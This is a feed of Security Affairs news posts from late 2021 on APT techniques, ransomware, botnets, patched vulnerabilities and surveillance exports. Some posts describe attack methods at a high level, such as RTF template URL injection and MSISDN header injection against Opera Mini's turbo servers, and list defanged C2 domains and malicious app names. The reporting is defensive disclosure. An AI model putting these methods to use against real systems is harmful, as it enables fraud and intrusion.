🔒
There are new articles available, click to refresh the page.
Today — 1 December 2021Security Affairs

New RTF Template Inject technique used by APT groups in recent attacks

1 December 2021 at 15:11

Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks.

The technique was first reported by the security firm Proofpoint spotted which observed phishing campaigns using the weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

The RTF template injection technique abuses legitimate RTF template functionality to subvert the plain text document formatting properties of the file and retrieve a malicious payload from a remote server instead of a file resource via an RTF’s template control word capability. The feature used by attackers allow to load an RTF template from a specific URL resource instead of a local file resource. Threat actors simply replace a legitimate file destination with a malicious download link. 

Experts pointed out that the technique has a lower detection rate by public antivirus engines when compared to the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by ProofPoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors used Unicode signed character notation to obfuscate the URL value included in the RTF file. The trick was used in the attempt to evade static detection signatures in anti-virus engines.

RTF template injection technique

The attack also works when in the case of .doc.rtf files that are opened utilizing Microsoft Word. When an RTF Remote Template Injection file is opened with MS Word, the application will retrieve the resource from the specified URL before displaying the content of the file. 

Proofpoint reported it observed the technique was used by DoNot Team, Gamaredon, and a TA423 APT groups.

RTF Template Injection 2

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RTF template injection)

The post New RTF Template Inject technique used by APT groups in recent attacks appeared first on Security Affairs.

FBI training document shows lawful access to multiple encrypted messaging apps

1 December 2021 at 09:57

Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them.

The Record shared an FBI training document that reveals the surveillance capabilities of the US law enforcement detailing which data can be extracted from encrypted messaging apps.

The document analyzes lawful access to multiple encrypted messaging apps, including iMessage, Line, Signal, Telegram, Threema, Viber, WhatsApp, WeChat, or Wickr.

Source Property of the People

The above document, dated to January 7, 2021, was obtained through a FOIA request filed by the US nonprofit organization Property of the People.

We got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3

— PropertyOfThePeople (@PropOTP) November 29, 2021

“As of November2020, the FBl’s ability to legally access secure content on leading messaging applications is depicted below, including details on accessible information based on-the applicable legal process. Return data provided
by the companies listed below, with the exception of WhatsApp, are actually logs of latent data that are provided to law enforcement in a non-real-time manner and may impact investigations due to delivery delays.” reads the document.

The information reported in the training documents provides an up to date picture of the abilities of law enforcement in accessing the content of popular messaging apps.

Feds cannot access the message content for Signal, Telegram, Threema, Viber, WeChat, and Wickr, while they can gain limited access to the content of encrypted communications from iMessage, Line, and WhatsApp.

Anyway, depending on the single encrypted messaging apps, law enforcement could extract varying metadata that could allow unmasking the end-users.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, messaging apps)

The post FBI training document shows lawful access to multiple encrypted messaging apps appeared first on Security Affairs.

Sabbath Ransomware target critical infrastructure in the US and Canada

1 December 2021 at 07:25

Sabbath ransomware is a new threat that has been targeting critical infrastructure in the United States and Canada since June 2021.

A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States and Canada since June 2021. According to Mandiant researchers, the group is a rebrand of Arcane and Eruption gangs.

According to a warning from Mandiant, the group previously operated under the names of Arcane and Eruption and was observed last year deploying the ROLLCOAST ransomware. In September 2021, the security experts noticed a post on the exploit.in hacking forum looking for affiliated for a new ransomware operation. The activity of the new group, named 54BB47h (Sabbath), began on October 21, 2021, when the operators set up a shaming site and blog.

In October the ransomware gang infected systems at a school district in the United States and demanded a multi-million ransom.

Sabbath ransomware

Unlike other ransomware operations, Sabbath operators provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads.

“In contrast with most other affiliate programs, Mandiant observed two occasions where the ransomware operator provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads. While the use of BEACON is common practice in ransomware intrusions, the use of a ransom affiliate program operator provided BEACON is unusual and offers both a challenge for attribution efforts while also offering additional avenues for detection.” reads the post published by Mandiant.

The Sabbath ransomware gang has targeted critical infrastructure, including education, health, and natural resources in the United States and Canada. 

In July 2020, the UNC2190 threat actors deployed ROLLCOAST ransomware while they were branded as Eruption. Mandiant researchers found no evidence for the use of the same ransomware in 2021.

The ROLLCOAST ransomware runs in memory and checks the system language to avoid infecting Russia and other Commonwealth of Independent States member countries.

ROLLCOAST also shows similarities to Tycoon ransomware, such as the use of AES in GCM mode for encryption and an overlap between the ignored directories, files, and extensions including the ignored extension “.lolz”.

In 2021, BEACON samples and infrastructure from both Sabbath and Arcane ransomware affiliate services have not changed. Mandiant discovered that the ransomware operators are using the Themida packer to pack UNC2190 BEACON malware and avoid detection.

“Although UNC2190 is a lesser known and potentially a smaller ransomware affiliate group, it’s smaller size and repeated rebranding has allowed it to avoid much public scrutiny.” concludes the report. “UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering. This highlights how well-known tools, such as BEACON, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Sabbath ransomware)

The post Sabbath Ransomware target critical infrastructure in the US and Canada appeared first on Security Affairs.

Yesterday — 30 November 2021Security Affairs

Play the Opera Please – Opera patches a flaw in their turbo servers

30 November 2021 at 21:24

Opera released a mini patch for a vulnerability in their turbo servers that dates back to 2018.

Prior approval are taken from Opera security team before disclosing this issue!

Before we get started there are few things which we need to understand such as,

Value added service (VAS): Value added services (VAS) is a popular telecommunications term for non-core services, example: (Caller-tunes, Missed call alerts, Online gaming etc).

GGSN: The gateway GPRS support node (GGSN) is a main core component, GGSN is responsible for the interworking between the GPRS network and external packet, basically this is a routing device.

HTTP header enrichment (HE Process): HTTP header enrichment is the process of adding data fields in the HTTP header. This is commonly used in mobile networks by adding user and device identifiers in HTTP requests such as IMEI, IMSI, MSISDN or other data to identify subscriber or mobile device details[1].

As per my understanding during a VAS subscription process, GGSN picks up the MSISDN from HTTP header to subscribe end users, the idea is to abuse HTTP header enrichment process via Opera mini browser which could lead to fraudulent VAS activation.

Why Opera mini? Opera mini is famous for data compression (data saving mode) although it supports three types of data savings compressions modes. direct, extreme and high.

Once the request is initiated and routed by GGSN all communication happens in HTTPS, hence GGSN will not be familiar with the source MSISDN, because there is no header enrichment process, Opera turbo server establishes a secure session to perform the rest of the process during the subscription. In this case, GGSN acts as a routing device and fails to perform HE process (Because HE can only be performed on HTTP protocol but Opera mini creates an HTTPS-based session).

Post this if we navigated to https://www.inputzer.io sniff the packets via Wireshark the source IP would be our public IP and destination hits to opera turbo servers such as `global-4-lvs-hopper.opera-mini.net` rather than www.inputzero.io.

Having said that, after countless assessment on the subscription process via opera mini, I found one `ping`  request which is generated via opera mini, when its is open for the first time after clearing the cache and temp data of the browser. It was observed, that ping request is responsible for taking MSISDN and creating the session for entire flow.

Injecting MSISDN headers in this request with the victims MSISDN, the session was established by the victims number with opera turbo server and now you can impersonate the victim and subscribe for any VAS service to deduct his/her digital money. With a successful subscription using the above steps and server log it was concluded that opera turbo servers don’t validate/filter certain injected HTTP headers which lead to activation of VAS services.

Patch: Opera turbo stops forwarding such injected HTTP headers and CVE-2018-19825 was assigned to this which states “Lack of filtering of certain HTTP headers could lead to fraudulent VAS activation.”

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original Post @ https://www.inputzero.io/2021/04/play-the-opera-please.html

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

The post Play the Opera Please – Opera patches a flaw in their turbo servers appeared first on Security Affairs.

New EwDoor Botnet is targeting AT&T customers

30 November 2021 at 19:09

360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices.

Experts from Qihoo 360’s Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers using EdgeMarc Enterprise Session Border Controller (ESBC) edge devices that are publicly exposed to the Internet.

The attackers are targeting Edgewater Networks’ devices by exploiting the CVE-2017-6079 vulnerability with a relatively unique mount file system command.

“On October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks’ devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which had our attention, and after analysis, we confirmed that this was a brand new botnet, and based on it’s targeting of Edgewater producers and its Backdoor feature, we named it EwDoor.” reads the analysis published by Qihoo 360 .

For a limited period of time, the researchers were able to determine the dimension of the botnet through sinkholing, the experts noticed that the EwDoor use a backup mechanism for its C2 and registered a backup command-and-control (C2) domain (iunno[.]se) to analyze the connections from the infected devices.

Later EwDoor operators changed the communication model and experts were no more able to analyze the requesters.

During a few hours of observation, the researchers discovered that the infected systems were EdgeMarc Enterprise Session Border Controller used by AT&T. The experts identified 5,700 infected systems located in the US.

“By back-checking the SSl certificates used by these devices [infected devices that the C2 during sinkholing], we found that there were about 100k IPs using the same SSl certificate. We are not sure how many devices corresponding to these IPs could be infected, but we can speculate that as they belong to the same class of devices the possible impact is real.” continues the report.

Researchers have identified 3 versions of the malware, the bot was mainly used to launch DDoS attacks ad to establish a backdoor on infected devices to gather sensitive information, such as call logs.

The bot supports the following functions:

  • Self updating
  • Port scanning
  • File management
  • DDoS attack
  • Reverse SHELL
  • Execute arbitrary commands
EwDoor

The botnet implements a series of safeguards to prevent analysis from security experts such as the use of TLS protocol to prevent communication from being intercepted, the encryption of sensitive resources to make it hard reverse engineering and moved C2 to cloud and it is sent by BT tracker to prevent direct extraction by IOC system.

“Modify the “ABIFLAGS” PHT in ELF to counter qemu-user and some high kernel versions of the linux sandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar with the Linux kernel, QEMU, and Edgewater devices.” continues the report.

The experts provide additional technical details on the EwDoor botnet in the report and shared indicators of compromise (IOCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, EwDoor)

The post New EwDoor Botnet is targeting AT&T customers appeared first on Security Affairs.

Critical Printing Shellz flaws impact 150 HP multifunction printer models

30 November 2021 at 15:44

Researchers discovered a critical wormable buffer overflow vulnerability that affects 150 different HP multifunction printer models (MFPs).

Cybersecurity researchers from F-Secure have discovered two critical vulnerabilities, collectively tracked as Printing Shellz, that impact approximately 150 multifunction printer models.

The vulnerabilities can be exploited by attackers to take control of vulnerable devices and steal sensitive information, from enterprise networks. The issues date back to 2013 and HP fixed them ([1], [2]) in November. The company acknowledged F-Secure Labs researchers Timo Hirvonen and Alexander Bolshev for reporting the vulnerabilities on April 29, 2021.

The two vulnerabilities are:

  • CVE-2021-39237 (CVSS score: 7.1) – An information disclosure vulnerability impacting certain HP LaserJet, HP LaserJet Managed, HP PageWide, and HP PageWide Managed printers.
  • CVE-2021-39238 (CVSS score: 9.3) – A buffer overflow vulnerability impacting certain HP Enterprise LaserJet, HP LaserJet Managed, HP Enterprise PageWide, and HP PageWide Managed products.

We found multiple exploitable bugs in a HP multi-function printer (MFP). The flaws are in the unit’s communications board and font parser.” reads the FAQs published by F-Secure researchers. “An attacker can exploit them to gain code execution rights, with the former requiring physical access while the latter can be accomplished remotely. A successful attack will allow an adversary to achieve various objectives, including stealing information or using the compromised machine as a beachhead for future attacks against an organization.

Threat actors can exploit both flaws locally via physical access to the vulnerable device, for example by Printing from USB drives. Another attack scenario sees attackers printing from another device in the same network segment, in this case, the threat actor uses an exploit that replicates itself to other vulnerable MFPs across the network.

Below are the attack scenarios detailed by the researchers:

  • Printing from USB drives. This is what we used during the research. In the modern firmware versions, printing from USB is disabled by default.
  • Social engineering a user into printing a malicious document. It may be possible to embed an exploit for the font-parsing vulnerabilities in a PDF. The opportunities for social engineering are endless: HR printing a CV before a job interview, a receptionist printing a boarding pass, etc.
  • Printing by connecting directly to the physical LAN port.
  • Printing from another device that is under attacker’s control and in the same network segment. This also implies that the respective flaw (CVE-2021-39238) is wormable, i.e., the exploit can be used to create a worm that replicates itself to other vulnerable MFPs across the network.
  • Cross-site printing (XSP): sending the exploit to the printer directly from the browser (by tricking a user into visiting a malicious website, for example) using an HTTP POST to JetDirect port 9100/TCP. This is probably the most attractive attack vector.
  • Direct attack via exposed UART ports that are mentioned in CVE-2021-39237, if attacker has physical access to the device for a short period of time.

Organizations should install the patches as soon as possible, the public disclosure of the vulnerabilities will likely trigger a wave of attacks attempting to exploit the vulnerabilities.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, HP multifunction printers)

The post Critical Printing Shellz flaws impact 150 HP multifunction printer models appeared first on Security Affairs.

WIRTE APT group targets the Middle East since at least 2019

30 November 2021 at 13:57

A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East.

Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that is targeting government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East since early 2019.

The activity of the WIRTE group has been documented by cybersecurity researchers at Lab52 in2019, the group is a politically motivated threat actor linked to the Gaza Cybergang. Other victims targeted by the group are in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.

WIRTE APT

The group launched spear-phishing campaigns using weaponized Microsoft Office documents to deploy VBS/VBA implants. The weaponized Excel documents acted as droppers that use hidden spreadsheets and VBA macros to deliver a first stage implant, which is a Visual Basic Script (VBS). The VBS implant is a script that collects system information and executes arbitrary code on the infected machine.

The first stage implant also downloads and installs a next-stage dropper named Ferocious that leverages a living-off-the-land (LotL) technique called COM hijacking to achieve persistence and and execute another PowerShell script dubbed LitePower Stager

The LitePower stager is a small PowerShell implant that acts as a downloader and secondary stager used to execute commands sent by the C2, it also allow to download and deploy further malware. The experts were able to locate C2 servers in Ukraine and Estonia.

“In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019.” continues the analysis.”These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.”

WIRTE operators remain under the radar for a long period of time, the attacks against law firms and financial institutions represent an important switch for a group that is politically motivated.

“WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.” continues the report. “Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

The post WIRTE APT group targets the Middle East since at least 2019 appeared first on Security Affairs.

4 Android banking trojans were spread via Google Play infecting 300.000+ devices

30 November 2021 at 07:44

Experts found four Android banking trojans that were available on the official Google Play Store and that infected +300,000 devices.

Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official Google Play Store between August and November 2021. According to the experts, the malware infected more than 300,000 devices through multiple dropper apps.

dropper apps banking Trojan

Threat actors are refining their techniques to bypass security checks implemented by Google for the app in its Play Store. A trick to bypass the checks consists of introducing carefully planned small malicious code updates over a longer period in Google Play. Another technique used by the threat actors involves designing look-alike command-and-control (C2) websites that match the theme of the dropper app so as to slip past conventional detection methods.

“To make themselves even more difficult to detect, the actors behind these dropper apps only manually activate the installation of the banking trojan on an infected device in case they desire more victims in a specific region of the world. This makes automated detection a much harder strategy to adopt by any organization.” reads the analysis published by the experts. “VirusTotal does not showcase the evolution of detections of antivirus products over time, but almost all campaigns have or had a 0/62 FUD score on VirusTotal at some point in time, confirming the difficulty of detecting dropper apps with a minimal footprint.”

The droppers were designed to distribute the Android banking trojan Anatsa, Alien, ERMAC, and Hydra.

Below is the list of dropper apps used to distribute the above banking trojan:

  • Two Factor Authenticator (com.flowdivison)
  • Protection Guard (com.protectionguard.app)
  • QR CreatorScanner (com.ready.qrscanner.mix)
  • Master Scanner Live (com.multifuction.combine.qr)
  • QR Scanner 2021 (com.qr.code.generate)
  • QR Scanner (com.qr.barqr.scangen)
  • PDF Document (com.xaviermuches.docscannerpro2)
  • Scanner – Scan to PDF
  • PDF Document Scanner (com.docscanverifier.mobile)
  • PDF Document Scanner Free (com.doscanner.mobile)
  • CryptoTracker (cryptolistapp.app.com.cryptotracker)
  • Gym and Fitness Trainer (com.gym.trainer.jeux)

ThreatFabric researchers spotted multiple samples dropped by the Brunhilda threat actor, the same group that was spotted distributing the Vultur Trojan in July 2021. In one case, the researchers observed Brunhilda posing as a QR code creator app used to drop Hydra and Ermac malware on the devices of users in were previously untapped countries, like the United States.

“In the span of only 4 months, 4 large Android families were spread via Google Play, resulting in 300.000+ infections via multiple dropper apps.” concludes the report. “A noticeable trend in the new dropper campaigns is that actors are focusing on loaders with a reduced malicious footprint in Google Play, considerably increasing the difficulties in detecting them with automation and machine learning techniques.

The small malicious footprint is a result of the new Google Play restrictions (current and planned) to put limitations on the use of privacy concerning app permissions.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, banking Trojan)

The post 4 Android banking trojans were spread via Google Play infecting 300.000+ devices appeared first on Security Affairs.

Before yesterdaySecurity Affairs

Google experts found 2 flaws in video conferencing software Zoom

29 November 2021 at 22:53

Google Project Zero researchers have discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks.

Security researchers from Google Project Zero discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks. The vulnerabilities impact Zoom Client for Meetings on Windows, macOS, Linux, iOS, and Android.

The issues in the video conferencing software Zoom were discovered by Google Project Zero researcher Natalie Silvanovich. The first flaw, tracked as CVE-2021-34423, is a high-severity buffer overflow vulnerability that received a CVSS base score of 7.3.

“A buffer overflow vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin. This can potentially allow a malicious actor to crash the service or application, or leverage this vulnerability to execute arbitrary code.” reads the security advisory published by Zoom.

The second vulnerability addressed by the company is a memory corruption issue, tracked as CVE-2021-34424, that received a CVSS base score of 7.3.

“A vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin which potentially allowed for the exposure of the state of process memory. This issue could be used to potentially gain insight into arbitrary areas of the product’s memory.” reads the advisory.

Below is the list of affected Zoom products:

  • Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4
  • Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1
  • Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4
  • Zoom Client for Meetings for Chrome OS before version 5.0.1
  • Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3
  • Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3
  • Zoom VDI before version 5.8.4
  • Zoom Meeting SDK for Android before version 5.7.6.1922
  • Zoom Meeting SDK for iOS before version 5.7.6.1082
  • Zoom Meeting SDK for macOS before version 5.7.6.1340
  • Zoom Meeting SDK for Windows before version 5.7.6.1081
  • Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2
  • Zoom On-Premise Meeting Connector Controller before version 4.8.12.20211115
  • Zoom On-Premise Meeting Connector MMR before version 4.8.12.20211115
  • Zoom On-Premise Recording Connector before version 5.1.0.65.20211116
  • Zoom On-Premise Virtual Room Connector before version 4.4.7266.20211117
  • Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117
  • Zoom Hybrid Zproxy before version 1.0.1058.20211116
  • Zoom Hybrid MMR before version 4.6.20211116.131_x86-64

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, video conferencing software Zoom)

The post Google experts found 2 flaws in video conferencing software Zoom appeared first on Security Affairs.

Panasonic confirmed that its network was illegally accessed by attackers

29 November 2021 at 21:36

Panasonic disclosed a security breach after threat actors gained access to its servers storing potentially sensitive information.

Japanese electronics giant Panasonic disclosed a security breach after threat actors gained access to some servers of the company containing sensitive data.

The company discovered the intrusion on November 11 and immediately launched an investigation, which is still ongoing, to determine the scope of the attack.

“Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021. As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion.” reads the notice of unauthorized access to file server. “After detecting the unauthorized access, the company immediately reported the incident to the relevant authorities and implemented security countermeasures, including steps to prevent external access to the network.”

The company retained a third-party cybersecurity firm to investigate the leak and determine which kind of information was stolen by the attackers.

Japanese news websites ([1], [2]) reported that threat actors gained access to information related to the company’s technology, business partners’ data, and employees’ information.

According to the Mainichi website, threat actors reportedly accessed the Panasonic servers multiple times between June and November.

In November 2020, Panasonic suffered a data breach after a cyber attack hit an Indian subsidiary. At the time threat actors gained access to financial information, credentials and email addresses

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Panasonic)

The post Panasonic confirmed that its network was illegally accessed by attackers appeared first on Security Affairs.

Experts warn of attacks exploiting CVE-2021-40438 flaw in Apache HTTP Server

29 November 2021 at 15:18

Threat actors are exploiting the recently patched CVE-2021-40438 flaw in Apache HTTP servers, warns German Cybersecurity Agency and Cisco.

Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers.

The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an arbitrary origin server.

The vulnerability was patched in mid-September with the release of version 2.4.49, it impacts version 2.4.48 and earlier.

“A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user.” reads the change log for version 2.4.49.

Since the public disclosure of the vulnerability, several PoC exploits for CVE-2021-40438 have been published.

Now experts from Germany’s Federal Office for Information Security (BSI) and Cisco are warning of ongoing attacks attempting to exploit the vulnerability.

Cisco published a security advisory to inform its customers that it is investigating the impact of the issue on its products. The issue impacts Prime Collaboration Provisioning, Security Manager, Expressway series and TelePresence Video Communication Server (VCS) products. However, the IT giant states that it is still investigating its product line.

“In November 2021, the Cisco PSIRT became aware of exploitation attempts of the vulnerability identified by CVE ID CVE-2021-40438.” reads the security advisory published by CISCO.

The German BSI agency also published an alert about this vulnerability, it is aware of at least one attack exploiting this vulnerability.

“The BSI is aware of at least one case in which an attacker was able to do so through exploitation the vulnerability to obtain hash values of user credentials from the victim’s system. The vulnerability affects all versions of Apache HTTP Server 2.4.48 or older.” reads the alert published by the BSI.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-40438)

The post Experts warn of attacks exploiting CVE-2021-40438 flaw in Apache HTTP Server appeared first on Security Affairs.

Biopharmaceutical firm Supernus Pharmaceuticals hit by Hive ransomware during an ongoing acquisition

29 November 2021 at 13:17

Biopharmaceutical company Supernus Pharmaceuticals discloses a ransomware attack, the Hive ransomware claims to have stolen company data.

Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware attack that hit the firm last in Mid-November. The Company states that the security breach did not impact its operations, it notified government authorities and engaged cybersecurity experts and its outside law firm to respond to the incident. Supernus Pharmaceuticals also declared to have successfully recovered the encrypted files and has taken additional security measures to prevent future incidents.

“Supernus Pharmaceuticals, Inc. (NASDAQ: SUPN), a biopharmaceutical company, today announced that it was the recent target of a ransomware attack. The attack had no significant impact on the business and did not cause any serious disruption to the Company’s operations. The Company continues to operate without interruption and does not currently anticipate paying any ransom amounts to any criminal ransomware group.” reads the press release published by the company.

The company is a leading biopharmaceutical firm with more than 30 years of experience in developing and commercializing products that treat central nervous system (CNS) diseases.

The Hive ransomware gang claimed responsibility for the attack and published the following message on its dark web leak site:

“On 11.14.2021 SUPERNUS’s network was compromised, encrypted and 1.5 terabytes of data were exfiltrated. Since then Supernus Inc. was in constant negotiations to prevent a disclosure of this incident because of pending acquisition of ADAMAS PHARMACEUTICALS, INC. On Nov. 24 SUPERNUS INC. filed this document https://sec.report/Document/0001104659-21-143352/. The document has not an information about the breach. SUPERNUS partners and consumers have to be aware about company’s unethical behavior.”

Supernus Pharmaceuticals

The Hive operators claim to have stolen 1,5TB of data, they also pointed out that the leak of the stolen info could have a serious impact on the ongoing acquisition of ADAMAS PHARMACEUTICALS, INC.

The company added that it has not paid any ransomware.

“To date, the Company has not paid any ransom and has been able to restore all of the information encrypted by the criminal ransomware group.” concludes the press release. “Although to date the Company’s business and operations have not been significantly impacted by the incident, there is no assurance that further attacks may not significantly impact the Company’s business or operations and that information improperly obtained by the criminal ransomware group may not be exploited by the criminal ransomware group or other third parties. The Company will take appropriate action to protect any stolen confidential information and will continue to investigate the incident and monitor the situation going forward.”

On Friday, the company filed an 8-K Form with the SEC that also reports the ransomware attack.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Supernus Pharmaceuticals)

The post Biopharmaceutical firm Supernus Pharmaceuticals hit by Hive ransomware during an ongoing acquisition appeared first on Security Affairs.

Israel cut cyber export list, excluding totalitarian regimes

29 November 2021 at 08:33

Israel’s Ministry of Defense bans the sale of surveillance software and offensive hacking tools to tens of countries.

Israel’s Ministry of Defense has cut the list of countries to which Israeli surveillance and cybersecurity firms could sell their products and services.

65 countries have been excluded from the export list, which now includes only 37 nations, by the Israeli Government.

The export list currently only includes Australia, Austria, Belgium, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Iceland, India, Ireland, Italy, Japan, Latvia, Liechtenstein, Lithuania, Luxembourg, Malta, New Zealand, Norway, Portugal, Romania, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, the Netherlands, the U.K., and the U.S.

“Israel has updated the list of countries local companies are permitted to sell cybersecurity tools to, reducing the overall number to 37 countries, down from 102.” reports Calcalistech. “Assuming this claim is correct, it seems that Israel was very lenient in providing approvals for the sale of cyber tools and was aware of all the sales being made by NSO.”

Israel’s Ministry of Defense removed from the list countries such as Morocco, Mexico, Saudi Arabia, or the UAE, which because they abused the surveillance software acquired from the Israeli NSO Group. 

The decision to cut the list comes after the announcement of The Commerce Department’s Bureau of Industry and Security (BIS) to sanction four companies for the development of spyware or the sale of hacking tools used by nation-state actors. The firms are NSO Group and Candiru from Israel, Computer Security Initiative Consultancy PTE. LTD from Singapore, and Positive Technologies from Russia.

NSO Group and Candiru are being sanctioned for the development and sale of surveillance software used to spy on journalists and activists. 

Recently, Apple has sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, NSO Group is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

“The new list will significantly complicate matters for Israeli cybersecurity companies, especially those selling offensive cyber tools, to operate in countries with totalitarian regimes or with a record of violating human rights.” concludes Calcalistech. “The Israeli cybersecurity sector currently generates $10 billion in annual revenue, with offensive cyber believed to be responsible for 10% of those sales. Some 13% of all cybersecurity companies operate from Israel, with 29% of all investments in the sector being directed to Israeli companies.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, surveillance)

The post Israel cut cyber export list, excluding totalitarian regimes appeared first on Security Affairs.

French court indicted Nexa Technologies for complicity in acts of torture

28 November 2021 at 23:21

Nexa Technologies was indicted for complicity in acts of torture, the French firm is accused of having sold surveillance equipment to the Egypt.

Nexa Technologies offers a range of solutions for homeland security, including surveillance solutions. Now the French company was accused of having sold surveillance software to the Egyptian regime.

The cybersurveillance equipment was used by the Egyptian government to track down opponents.

Today the Agence France-Presse (AFP), revealed that Nexa Technologies was indicted on October 12 for “Complicity in acts of torture and enforced disappearances.”

“The indictment was pronounced on October 12 by the investigating judge in charge of the investigations, about four months after those of four executives and executives of the company, according to this source, confirmed by a judicial source. Contacted by AFP, the lawyer for Nexa Technologies, M  François Zimeray, declined to comment.” reported the website LeMonde.

The investigation began in 2017 following a complaint by FIDH and LDH filed with the support of the Cairo Institute for Human Rights Studies (CIHRS).

The complaint refers to the revelation made by the magazine Télérama that reported the sale in March 2014 of “a listening system at 10 million euros to fight – officially – against the Muslim Brotherhood” , the Islamist opposition in Egypt.

This was based on a survey by the magazine Telerama revealing the sale in March 2014 of surveillance equipment, called Cerebro, that was used against the Muslim Brotherhood.

“A 10 million euro listening system to fight – officially – against the Muslim Brotherhood. In two months, the case was heard. The contract was signed in March 2014. Code name of the operation: “Toblerone”. A cryptic nod to the triangular shape of the pyramids …” reported Télérama. “In short, Cerebro can suck up any data that is not encrypted. A weapon of choice for authoritarian governments.”

